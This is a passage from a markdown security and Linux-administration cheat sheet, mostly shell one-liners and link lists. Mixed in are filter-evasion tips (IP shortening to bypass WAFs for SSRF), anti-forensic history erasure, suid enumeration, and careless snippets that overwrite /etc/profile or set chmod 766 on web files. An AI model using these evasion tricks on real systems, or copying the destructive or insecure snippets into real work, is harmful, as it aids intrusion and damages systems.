&nbsp;&nbsp;:small_orange_diamond: <a href="https://nfsec.pl/">🌎 <b>nf.sec</b></a> - basic aspects and mechanisms of Linux operating system security (PL).<br> </p> ##### :black_small_square: Other/All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://changelog.com/">🌎 <b>Changelog</b></a> - is a community of hackers; news & podcasts for developers and hackers.<br> </p> #### Other Cheat Sheets &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ###### Build your own DNS Servers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://calomel.org/unbound_dns.html">🌎 <b>Unbound DNS Tutorial</b></a> - a validating, recursive, and caching DNS server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ctrl.blog/entry/knot-dns-resolver-tutorial.html">🌎 <b>Knot Resolver on Fedora</b></a> - how to get faster and more secure DNS resolution with Knot Resolver on Fedora.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2018/10/tutorial-setup-dns-over-https-server/">🌎 <b>DNS-over-HTTPS</b></a> - tutorial to setup your own DNS-over-HTTPS (DoH) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacks.mozilla.org/2018/05/a-cartoon-intro-to-dns-over-https/">🌎 <b>dns-over-https</b></a> - a cartoon intro to DNS over HTTPS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2019/03/dns-over-tls/">🌎 <b>DNS-over-TLS</b></a> - following to your DoH server, setup your DNS-over-TLS (DoT) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zwischenzugs.com/2018/01/26/how-and-why-i-run-my-own-dns-servers/">🌎 <b>DNS Servers</b></a> - how (and why) i run my own DNS Servers.<br> </p> ###### Build your own Certificate Authority <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jamielinux.com/docs/openssl-certificate-authority/">🌎 <b>OpenSSL Certificate Authority</b></a> - build your own certificate authority (CA) using the OpenSSL tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5507⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;376🍴</code></b> <a href="https://github.com/smallstep/certificates"><b>step-ca Certificate Authority</b></a></a> - build your own certificate authority (CA) using open source step-ca.<br> </p> ###### Build your own System/Virtual Machine <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;25405⭐</code></b> <b><code>&nbsp;&nbsp;3176🍴</code></b> <a href="https://github.com/cfenollosa/os-tutorial"><b>os-tutorial</b></a></a> - how to create an OS from scratch.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://justinmeiners.github.io/lc3-vm/">🌎 <b>Write your Own Virtual Machine</b></a> - how to write your own virtual machine (VM).<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4470⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;388🍴</code></b> <a href="https://github.com/cirosantilli/x86-bare-metal-examples"><b>x86 Bare Metal Examples</b></a></a> - dozens of minimal operating systems to learn x86 system programming.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1520⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;148🍴</code></b> <a href="https://github.com/djhworld/simple-computer"><b>simple-computer</b></a></a> - the scott CPU from "But How Do It Know?" by J. Clark Scott.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://littleosbook.github.io/">🌎 <b>littleosbook</b></a> - the little book about OS development.<br> </p> ###### DNS Servers list (privacy) | <b><u>IP</u></b> | <b><u>URL</u></b> | | :--- | :--- | | **`84.200.69.80`** | 🌎 [dns.watch](dns.watch/) | | **`94.247.43.254`** | 🌎 [opennic.org](www.opennic.org/) | | **`64.6.64.6`** | 🌎 [verisign.com](www.verisign.com/en_US/security-services/public-dns/index.xhtml) | | **`89.233.43.71`** | 🌎 [censurfridns.dk](blog.uncensoreddns.org/) | | **`1.1.1.1`** | 🌎 [cloudflare.com](1.1.1.1/) | | **`94.130.110.185`** | 🌎 [dnsprivacy.at](dnsprivacy.at/) | ###### TOP Browser extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`IPvFoo`** | Display the server IP address and HTTPS information across all page elements. | | **`FoxyProxy`** | Simplifies configuring browsers to access proxy-servers. | | **`HTTPS Everywhere`** | Automatically use HTTPS security on many sites. | | **`uMatrix`** | Point & click to forbid/allow any class of requests made by your browser. | | **`uBlock Origin`** | An efficient blocker: easy on memory and CPU footprint. | | **`Session Buddy`** | Manage browser tabs and bookmarks with ease. | | **`SuperSorter`** | Sort bookmarks recursively, delete duplicates, merge folders, and more. | | **`Clear Cache`** | Clear your cache and browsing data. | | **`d3coder`** | Encoding/Decoding plugin for various types of encoding. | | **`Web Developer`** | Adds a toolbar button with various web developer tools. | | **`ThreatPinch Lookup`** | Add threat intelligence hover tool tips. | ###### TOP Burp extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`Active Scan++`** | Extends Burp's active and passive scanning capabilities. | | **`Autorize`** | Automatically detects authorization enforcement. | | **`AuthMatrix`** | A simple matrix grid to define the desired levels of access privilege. | | **`Logger++`** | Logs requests and responses for all Burp tools in a sortable table. | | **`Bypass WAF`** | Adds headers useful for bypassing some WAF devices. | | **`JSON Beautifier`** | Beautifies JSON content in the HTTP message viewer. | | **`JSON Web Tokens`** | Enables Burp to decode and manipulate JSON web tokens. | | **`CSP Auditor`** | Displays CSP headers for responses, and passively reports CSP weaknesses. | | **`CSP-Bypass`** | Passively scans for CSP headers that contain known bypasses. | | **`Hackvertor`** | Converts data using a tag-based configuration to apply various encoding. | | **`HTML5 Auditor`** | Scans for usage of risky HTML5 features. | | **`Software Vulnerability Scanner`** | Vulnerability scanner based on vulners.com audit API. | | **`Turbo Intruder`** | Is a powerful bruteforcing tool. | | **`Upload Scanner`** | Upload a number of different file types, laced with different forms of payload. | ###### Hack Mozilla Firefox address bar In Firefox's address bar, you can limit results by typing special characters before or after your term: - `^` - for matches in your browsing history - `*` - for matches in your bookmarks. - `%` - for matches in your currently open tabs. - `#` - for matches in page titles. - `@` - for matches in web addresses. ###### Chrome hidden commands - `chrome://chrome-urls` - list of all commands - `chrome://flags` - enable experiments and development features - `chrome://interstitials` - errors and warnings - `chrome://net-internals` - network internals (events, dns, cache) - `chrome://network-errors` - network errors - `chrome://net-export` - start logging future network activity to a file - `chrome://safe-browsing` - safe browsing options - `chrome://user-actions` - record all user actions - `chrome://restart` - restart chrome - `chrome://dino` - ERR_INTERNET_DISCONNECTED... - `cache:<website-address>` - view the cached version of the web page ###### Bypass WAFs by Shortening IP Address (by 🌎 [0xInfection](twitter.com/0xInfection)) IP addresses can be shortened by dropping the zeroes: ``` http://1.0.0.1 → http://1.1 http://127.0.0.1 → http://127.1 http://192.168.0.1 → http://192.168.1 http://0xC0A80001 or http://3232235521 → 192.168.0.1 http://192.168.257 → 192.168.1.1 http://192.168.516 → 192.168.2.4 ``` > This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. For more information please see [How to Obscure Any URL](http://www.pc-help.org/obscure.htm) and 🌎 [Magic IP Address Shortcuts](stuff-things.net/2014/09/25/magic-ip-address-shortcuts/). ###### Hashing, encryption and encoding (by 🌎 [Michal Špaček](twitter.com/spazef0rze)) _Hashing_ plaintext :arrow_right: hash<br> hash :no_entry: plaintext _Symmetric encryption_ plaintext :arrow_right: :key: :arrow_right: ciphertext<br> plaintext :arrow_left: :key: :arrow_left: ciphertext<br> (:key: shared key) _Asymmetric encryption_ plaintext :arrow_right: :key: :arrow_right: ciphertext<br> plaintext :arrow_left: :part_alternation_mark: :arrow_left: ciphertext<br> (:key: public key, :part_alternation_mark: private key)<br> _Encoding_ text :arrow_right: encoded<br> text :arrow_left: encoded #### Shell One-liners &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents * [terminal](#tool-terminal) * [busybox](#tool-busybox) * [mount](#tool-mount) * [fuser](#tool-fuser) * [lsof](#tool-lsof) * [ps](#tool-ps) * [top](#tool-top) * [vmstat](#tool-vmstat) * [iostat](#tool-iostat) * [strace](#tool-strace) * [kill](#tool-kill) * [find](#tool-find) * [diff](#tool-diff) * [vimdiff](#tool-vimdiff) * [tail](#tool-tail) * [cpulimit](#tool-cpulimit) * [pwdx](#tool-pwdx) * [tr](#tool-tr) * [chmod](#tool-chmod) * [who](#tool-who) * [last](#tool-last) * [screen](#tool-screen) * [script](#tool-script) * [du](#tool-du) * [inotifywait](#tool-inotifywait) * [openssl](#tool-openssl) * [secure-delete](#tool-secure-delete) * [dd](#tool-dd) * [gpg](#tool-gpg) * [system-other](#tool-system-other) * [curl](#tool-curl) * [httpie](#tool-httpie) * [ssh](#tool-ssh) * [linux-dev](#tool-linux-dev) * [tcpdump](#tool-tcpdump) * [tcpick](#tool-tcpick) * [ngrep](#tool-ngrep) * [hping3](#tool-hping3) * [nmap](#tool-nmap) * [netcat](#tool-netcat) * [socat](#tool-socat) * [p0f](#tool-p0f) * [gnutls-cli](#tool-gnutls-cli) * [netstat](#tool-netstat) * [rsync](#tool-rsync) * [host](#tool-host) * [dig](#tool-dig) * [certbot](#tool-certbot) * [network-other](#tool-network-other) * [git](#tool-git) * [awk](#tool-awk) * [sed](#tool-sed) * [grep](#tool-grep) * [perl](#tool-perl) ##### Tool: 🌎 [terminal](en.wikipedia.org/wiki/Linux_console) ###### Reload shell without exit ```bash exec $SHELL -l ``` ###### Close shell keeping all subprocess running ```bash disown -a && exit ``` ###### Exit without saving shell history ```bash kill -9 $$ unset HISTFILE && exit ``` ###### Perform a branching conditional ```bash true && echo success false || echo failed ``` ###### Pipe stdout and stderr to separate commands ```bash some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr) ``` ###### Redirect stdout and stderr each to separate files and print both to the screen ```bash (some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog ``` ###### List of commands you use most often ```bash history | \ awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \ grep -v "./" | \ column -c3 -s " " -t | \ sort -nr | nl | head -n 20 ``` ###### Sterilize bash history ```bash function sterile() { history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\ curl\b+.*(-E|--cert)\b+.*\b*|\ curl\b+.*--pass\b+.*\b*|\ curl\b+.*(-U|--proxy-user).*:.*\b*|\ curl\b+.*(-u|--user).*:.*\b* .*(-H|--header).*(token|auth.*)\b+.*|\ wget\b+.*--.*password\b+.*\b*|\ http.?://.+:.+@.*\ " > $HOME/histbuff; history -r $HOME/histbuff; } export PROMPT_COMMAND="sterile" ``` > Look also: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;3⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0🍴</code></b> [A naive utility to censor credentials in command history](https://github.com/lbonanomi/go/blob/master/revisionist.go)). ###### Quickly backup a file ```bash cp filename{,.orig} ``` ###### Empty a file (truncate to 0 size) ```bash >filename ``` ###### Delete all files in a folder that don't match a certain file extension ```bash rm !(*.foo|*.bar|*.baz) ``` ###### Pass multi-line string to a file ```bash # cat >filename ... - overwrite the file # cat >>filename ... - append to a file cat > filename << __EOF__ data data data __EOF__ ``` ###### Edit a file on a remote host using vim ```bash vim scp://user@host//etc/fstab ``` ###### Create a directory and change into it at the same time ```bash mkd() { mkdir -p "$@" && cd "$@"; } ``` ###### Convert uppercase files to lowercase files ```bash rename 'y/A-Z/a-z/' * ``` ###### Print a row of characters across the terminal ```bash printf "%`tput cols`s" | tr ' ' '#' ``` ###### Show shell history without line numbers ```bash history | cut -c 8- fc -l -n 1 | sed 's/^\s*//' ``` ###### Run command(s) after exit session ```bash cat > /etc/profile << __EOF__ _after_logout() { username=$(whoami) for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do kill -9 $_pid done } trap _after_logout EXIT __EOF__ ``` ###### Generate a sequence of numbers ```bash for ((i=1; i<=10; i+=2)) ; do echo $i ; done # alternative: seq 1 2 10 for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done # alternative: seq -w 5 10 for i in {1..10} ; do echo $i ; done ``` ###### Simple Bash filewatching ```bash unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE' ``` --- ##### Tool: 🌎 [busybox](www.busybox.net/) ###### Static HTTP web server ```bash busybox httpd -p $PORT -h $HOME [-c httpd.conf] ``` ___ ##### Tool: [mount](https://en.wikipedia.org/wiki/Mount_(Unix)) ###### Mount a temporary ram partition ```bash mount -t tmpfs tmpfs /mnt -o size=64M ``` * `-t` - filesystem type * `-o` - mount options ###### Remount a filesystem as read/write ```bash mount -o remount,rw / ``` ___ ##### Tool: [fuser](https://en.wikipedia.org/wiki/Fuser_(Unix)) ###### Show which processes use the files/directories ```bash fuser /var/log/daemon.log fuser -v /home/supervisor ``` ###### Kills a process that is locking a file ```bash fuser -ki filename ``` * `-i` - interactive option ###### Kills a process that is locking a file with specific signal ```bash fuser -k -HUP filename ``` * `--list-signals` - list available signal names ###### Show what PID is listening on specific port ```bash fuser -v 53/udp ``` ###### Show all processes using the named filesystems or block device ```bash fuser -mv /var/www ``` ___ ##### Tool: 🌎 [lsof](en.wikipedia.org/wiki/Lsof) ###### Show process that use internet connection at the moment ```bash lsof -P -i -n ``` ###### Show process that use specific port number ```bash lsof -i tcp:443 ``` ###### Lists all listening ports together with the PID of the associated process ```bash lsof -Pan -i tcp -i udp ``` ###### List all open ports and their owning executables ```bash lsof -i -P | grep -i "listen" ``` ###### Show all open ports ```bash lsof -Pnl -i ``` ###### Show open ports (LISTEN) ```bash lsof -Pni4 | grep LISTEN | column -t ``` ###### List all files opened by a particular command ```bash lsof -c "process" ``` ###### View user activity per directory ```bash lsof -u username -a +D /etc ``` ###### Show 10 largest open files ```bash lsof / | \ awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \ sort -n -u | tail | column -t ``` ###### Show current working directory of a process ```bash lsof -p <PID> | grep cwd ``` ___ ##### Tool: [ps](https://en.wikipedia.org/wiki/Ps_(Unix)) ###### Show a 4-way scrollable process tree with full details ```bash ps awwfux | less -S ``` ###### Processes per user counter ```bash ps hax -o user | sort | uniq -c | sort -r ``` ###### Show all processes by name with main header ```bash ps -lfC nginx ``` ___ ##### Tool: [find](https://en.wikipedia.org/wiki/Find_(Unix)) ###### Find files that have been modified on your system in the past 60 minutes ```bash find / -mmin 60 -type f ``` ###### Find all files larger than 20M ```bash find / -type f -size +20M ``` ###### Find duplicate files (based on MD5 hash) ```bash find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33 ``` ###### Change permission only for files ```bash cd /var/www/site && find . -type f -exec chmod 766 {} \; cd /var/www/site && find . -type f -exec chmod 664 {} + ``` ###### Change permission only for directories ```bash cd /var/www/site && find . -type d -exec chmod g+x {} \; cd /var/www/site && find . -type d -exec chmod g+rwx {} + ``` ###### Find files and directories for specific user/group ```bash # User: find . -user <username> -print find /etc -type f -user <username> -name "*.conf" # Group: find /opt -group <group> find /etc -type f -group <group> -iname "*.conf" ``` ###### Find files and directories for all without specific user/group ```bash # User: find . \! -user <username> -print # Group: find . \! -group <group> ``` ###### Looking for files/directories that only have certain permission ```bash # User find . -user <username> -perm -u+rw # -rw-r--r-- find /home -user $(whoami) -perm 777 # -rwxrwxrwx # Group: find /home -type d -group <group> -perm 755 # -rwxr-xr-x ``` ###### Delete older files than 60 days ```bash find . -type f -mtime +60 -delete ``` ###### Recursively remove all empty sub-directories from a directory ```bash find . -depth -type d -empty -exec rmdir {} \; ``` ###### How to find all hard links to a file ```bash find </path/to/dir> -xdev -samefile filename ``` ###### Recursively find the latest modified files ```bash find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head ``` ###### Recursively find/replace of a string with sed ```bash find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g' ``` ###### Recursively find/replace of a string in directories and file names ```bash find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \; ``` ###### Recursively find suid executables ```bash find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \; ``` ___ ##### Tool: [top](https://en.wikipedia.org/wiki/Top_(software)) ###### Use top to monitor only all processes with the specific string ```bash top -p $(pgrep -d , <str>) ``` * `<str>` - process containing string (eg. nginx, worker) ___ ##### Tool: 🌎 [vmstat](en.wikipedia.org/wiki/Vmstat) ###### Show current system utilization (fields in kilobytes) ```bash vmstat 2 20 -t -w ``` * `2` - number of times with a defined time interval (delay) * `20` - each execution of the command (count) * `-t` - show timestamp * `-w` - wide output * `-S M` - output of the fields in megabytes instead of kilobytes ###### Show current system utilization will get refreshed every 5 seconds ```bash vmstat 5 -w ``` ###### Display report a summary of disk operations ```bash vmstat -D ``` ###### Display report of event counters and memory stats ```bash vmstat -s ``` ###### Display report about kernel objects stored in slab layer cache ```bash vmstat -m ``` ##### Tool: 🌎 [iostat](en.wikipedia.org/wiki/Iostat) ###### Show information about the CPU usage, and I/O statistics about all the partitions ```bash iostat 2 10 -t -m ``` * `2` - number of times with a defined time interval (delay) * `10` - each execution of the command (count) * `-t` - show timestamp * `-m` - fields in megabytes (`-k` - in kilobytes, default) ###### Show information only about the CPU utilization ```bash iostat 2 10 -t -m -c ``` ###### Show information only about the disk utilization ```bash iostat 2 10 -t -m -d ``` ###### Show information only about the LVM utilization ```bash iostat -N ``` ___ ##### Tool: 🌎 [strace](en.wikipedia.org/wiki/Strace) ###### Track with child processes ```bash # 1) strace -f -p $(pidof glusterfsd) # 2) strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g') ``` ###### Track process with 30 seconds limit ```bash timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid) ``` ###### Track processes and redirect output to a file ```bash ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \ xargs strace -o /tmp/strace-apache-proc.out ``` ###### Track with print time spent in each syscall and limit length of print strings ```bash ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \ xargs strace -f -e trace=network -T -s 10000 ``` ###### Track the open request of a network port ```bash strace -f -e trace=bind nc -l 80 ``` ###### Track the open request of a network port (show TCP/UDP) ```bash strace -f -e trace=network nc -lu 80 ``` ___ ##### Tool: [kill](https://en.wikipedia.org/wiki/Kill_(command)) ###### Kill a process running on port ```bash kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}') ``` ___ ##### Tool: 🌎 [diff](en.wikipedia.org/wiki/Diff) ###### Compare two directory trees ```bash diff <(cd directory1 && find | sort) <(cd directory2 && find | sort) ``` ###### Compare output of two commands ```bash diff <(cat /etc/passwd) <(cut -f2 /etc/passwd) ``` ___ ##### Tool: [vimdiff](http://vimdoc.sourceforge.net/htmldoc/diff.html) ###### Highlight the exact differences, based on characters and words ```bash vimdiff file1 file2 ``` ###### Compare two JSON files ```bash vimdiff <(jq -S . A.json) <(jq -S . B.json) ``` ###### Compare Hex dump ```bash d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1 | cut -d' ' -f3- | tr -s ' ';}; d ~/bin1 ~/bin2 ``` ###### diffchar Save 🌎 [diffchar](raw.githubusercontent.com/vim-scripts/diffchar.vim/master/plugin/diffchar.vim) @ `~/.vim/plugins` Click `F7` to switch between diff modes Usefull `vimdiff` commands: * `qa` to exit all windows * `:vertical resize 70` to resize window * set window width `Ctrl+W [N columns]+(Shift+)<\>` ___ ##### Tool: [tail](https://en.wikipedia.org/wiki/Tail_(Unix)) ###### Annotate tail -f with timestamps ```bash tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done ``` ###### Analyse an Apache access log for the most common IP addresses ```bash tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail ``` ###### Analyse web server log and show only 5xx http codes ```bash tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]" ``` ___ ##### Tool: [tar](https://en.wikipedia.org/wiki/Tar_(computing)) ###### System backup with exclude specific directories ```bash cd / tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* . ``` ###### System backup with exclude specific directories (pigz) ```bash cd / tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* \ --exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz . ``` ___ ##### Tool: [dump](https://en.wikipedia.org/wiki/Dump_(program)) ###### System backup to file ```bash dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo / ``` ###### Restore system from lzo file ```bash cd / restore -rf /backup/system$(date +%d%m%Y%s).lzo ``` ___ ##### Tool: [cpulimit](http://cpulimit.sourceforge.net/) ###### Limit the cpu usage of a process ```bash cpulimit -p pid -l 50 ``` ___ ##### Tool: 🌎 [pwdx](www.cyberciti.biz/faq/unix-linux-pwdx-command-examples-usage-syntax/) ###### Show current working directory of a process ```bash pwdx <pid> ``` ___ ##### Tool: 🌎 [taskset](www.cyberciti.biz/faq/taskset-cpu-affinity-command/) ###### Start a command on only one CPU core ```bash taskset -c 0 <command> ``` ___ ##### Tool: [tr](https://en.wikipedia.org/wiki/Tr_(Unix)) ###### Show directories in the PATH, one per line ```bash tr : '\n' <<<$PATH ``` ___ ##### Tool: 🌎 [chmod](en.wikipedia.org/wiki/Chmod) ###### Remove executable bit from all files in the current directory ```bash chmod -R -x+X * ``` ###### Restore permission for /bin/chmod ```bash # 1: cp /bin/ls chmod.01 cp /bin/chmod chmod.01 ./chmod.01 700 file # 2: /bin/busybox chmod 0700 /bin/chmod # 3: setfacl --set u::rwx,g::---,o::--- /bin/chmod ``` ___ ##### Tool: [who](https://en.wikipedia.org/wiki/Who_(Unix)) ###### Find last reboot time ```bash who -b ``` ###### Detect a user sudo-su'd into the current shell ```bash [[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)" ``` ___ ##### Tool: 🌎 [last](www.howtoforge.com/linux-last-command/) ###### Was the last reboot a panic? ```bash (last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \ grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot" ``` ___ ##### Tool: 🌎 [screen](en.wikipedia.org/wiki/GNU_Screen) ###### Start screen in detached mode ```bash screen -d -m <command> ``` ###### Attach to an existing screen session ```bash screen -r -d <pid> ``` ___ ##### Tool: [script](https://en.wikipedia.org/wiki/Script_(Unix)) ###### Record and replay terminal session ```bash ### Record session # 1) script -t 2>~/session.time -a ~/session.log # 2) script --timing=session.time session.log ### Replay session scriptreplay --timing=session.time session.log ``` ___ ##### Tool: 🌎 [du](en.wikipedia.org/wiki/GNU_Screen) ###### Show 20 biggest directories with 'K M G' ```bash du | \ sort -r -n | \ awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \ head -n 20 ``` ___ ##### Tool: 🌎 [inotifywait](en.wikipedia.org/wiki/GNU_Screen) ###### Init tool everytime a file in a directory is modified ```bash while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done; ``` ___ ##### Tool: 🌎 [openssl](www.openssl.org/) ###### Testing connection to the remote host ```bash echo | openssl s_client -connect google.com:443 -showcerts ``` ###### Testing connection to the remote host (debug mode) ```bash echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status ``` ###### Testing connection to the remote host (with SNI support) ```bash echo | openssl s_client -showcerts -servername google.com -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl version ```bash openssl s_client -tls1_2 -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl cipher ```bash openssl s_client -cipher 'AES128-SHA' -connect google.com:443 ``` ###### Verify 0-RTT ```bash _host="example.com" cat > req.in << __EOF__ HEAD / HTTP/1.1 Host: $_host Connection: close __EOF__ openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in ``` ###### Generate private key without passphrase ```bash # _len: 2048, 4096 ( _fd="private.key" ; _len="2048" ; \ openssl genrsa -out ${_fd} ${_len} ) ``` ###### Generate private key with passphrase ```bash # _ciph: aes128, aes256 # _len: 2048, 4096 ( _ciph="aes128" ; _fd="private.key" ; _len="2048" ; \ openssl genrsa -${_ciph} -out ${_fd} ${_len} ) ``` ###### Remove passphrase from private key ```bash ( _fd="private.key" ; _fd_unp="private_unp.key" ; \ openssl rsa -in ${_fd} -out ${_fd_unp} ) ``` ###### Encrypt existing private key with a passphrase ```bash # _ciph: aes128, aes256 ( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \ openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass} ``` ###### Check private key ```bash ( _fd="private.key" ; \ openssl rsa -check -in ${_fd} ) ``` ###### Get public key from private key ```bash ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl rsa -pubout -in ${_fd} -out ${_fd_pub} ) ``` ###### Generate private key and CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _len="2048" ; \ openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} ) ``` ###### Generate CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -out ${_fd_csr} -new -key ${_fd} ) ``` ###### Generate CSR (metadata from existing certificate) > Where `private.key` is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate. ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \ openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} ) ``` ###### Generate CSR with -config param ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \ -config <( cat << __EOF__ [req] default_bits = 2048 default_md = sha256 prompt = no distinguished_name = dn req_extensions = req_ext [ dn ] C = "<two-letter ISO abbreviation for your country>" ST = "<state or province where your organisation is legally located>" L = "<city where your organisation is legally located>" O = "<legal name of your organisation>" OU = "<section of the organisation>" CN = "<fully qualified domain name>" [ req_ext ] subjectAltName = @alt_names [ alt_names ] DNS.1 = <fully qualified domain name> DNS.2 = <next domain> DNS.3 = <next domain> __EOF__ )) ``` Other values in `[ dn ]`: ``` countryName = "DE" # C= stateOrProvinceName = "Hessen" # ST= localityName = "Keller" # L= postalCode = "424242" # L/postalcode= postalAddress = "Keller" # L/postaladdress= streetAddress = "Crater 1621" # L/street= organizationName = "apfelboymschule" # O= organizationalUnitName = "IT Department" # OU= commonName = "example.com" # CN= emailAddress = "[email protected]" # CN/emailAddress= ``` Example of `oids` (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under `[new_oids]`): ``` [req] ... oid_section = new_oids [ new_oids ] postalCode = 2.5.4.17 streetAddress = 2.5.4.9 ``` Full example: ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \ -config <( cat << __EOF__ [req] default_bits = 2048 default_md = sha256 prompt = no distinguished_name = dn req_extensions = req_ext oid_section = new_oids [ new_oids ] serialNumber = 2.5.4.5 streetAddress = 2.5.4.9 postalCode = 2.5.4.17 businessCategory = 2.5.4.15 [ dn ] serialNumber=00001111 businessCategory=Private Organization jurisdictionC=DE C=DE ST=Hessen L=Keller postalCode=424242 streetAddress=Crater 1621 O=AV Company OU=IT CN=example.com [ req_ext ] subjectAltName = @alt_names [ alt_names ] DNS.1 = example.com __EOF__ )) ``` For more information please look at these great explanations: - 🌎 [RFC 5280](tools.ietf.org/html/rfc5280) - 🌎 [How to create multidomain certificates using config files](apfelboymchen.net/gnu/notes/openssl%20multidomain%20with%20config%20files.html) - 🌎 [Generate a multi domains certificate using config files](gist.github.com/romainnorberg/464758a6620228b977212a3cf20c3e08) - 🌎 [Your OpenSSL CSR command is out of date](expeditedsecurity.com/blog/openssl-csr-command/) - 🌎 [OpenSSL example configuration file](www.tbs-certificats.com/openssl-dem-server-cert.cnf) - 🌎 [Object Identifiers (OIDs)](www.alvestrand.no/objectid/) - <b><code>&nbsp;22435⭐</code></b> <b><code>&nbsp;&nbsp;9922🍴</code></b> [openssl objects.txt](https://github.com/openssl/openssl/blob/master/crypto/objects/objects.txt)) ###### List available EC curves ```bash openssl ecparam -list_curves ``` ###### Print ECDSA private and public keys ```bash ( _fd="private.key" ; \ openssl ec -in ${_fd} -noout -text ) # For x25519 only extracting public key ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl pkey -in ${_fd} -pubout -out ${_fd_pub} ) ``` ###### Generate ECDSA private key ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="private.key" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ) # _curve: X25519 ( _fd="private.key" ; _curve="x25519" ; \ openssl genpkey -algorithm ${_curve} -out ${_fd} ) ``` ###### Generate private key and CSR (ECC) ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \ openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 ) ``` ###### Generate self-signed certificate ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _len="2048" ; _days="365" ; \ openssl req -newkey rsa:${_len} -nodes \ -keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} ) ``` ###### 